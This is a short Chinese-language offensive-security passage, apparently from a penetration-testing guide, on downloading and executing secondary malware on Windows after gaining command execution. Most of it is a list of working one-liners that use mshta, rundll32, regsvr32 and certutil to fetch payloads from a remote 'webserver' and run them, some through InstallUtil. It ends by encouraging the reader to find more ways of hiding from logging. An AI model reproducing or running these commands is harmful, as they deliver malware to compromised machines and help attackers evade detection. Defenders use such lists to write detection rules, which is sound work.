从命令行连接网络下载 Windows 文件

如果你通过应用程序漏洞获得了命令执行，又或者是通过 Office 或 PDF 文件获取了 shell，那么接下来的步骤可能是下载并执行你的辅助恶意软件。

对于这些情况，我们可以利用 Windows 的一些特性来完成任务。大多数这些例子来自 arno0x0x 和 @subtee 的卓越的研究成果（ https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code ）。

• mshta vbscript:Close(Execute(“GetObject(““script: http://webserver/payload.sct ””)”))
• mshta http://webserver/payload.hta
• rundll32.exe javascript:”..\mshtml,RunHTMLApplication”;o=GetObject(“script:http://webserver/payload.sct");window.close();
• regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
• certutil -urlcache -split -f http://webserver/payload payload
• certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
• certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

这些只是其中几个例子，还有更多通过命令行来执行辅助代码的方法。你还可以继续研究，看看是否还有其他技术可以用来从传统的日志记录中隐匿行踪。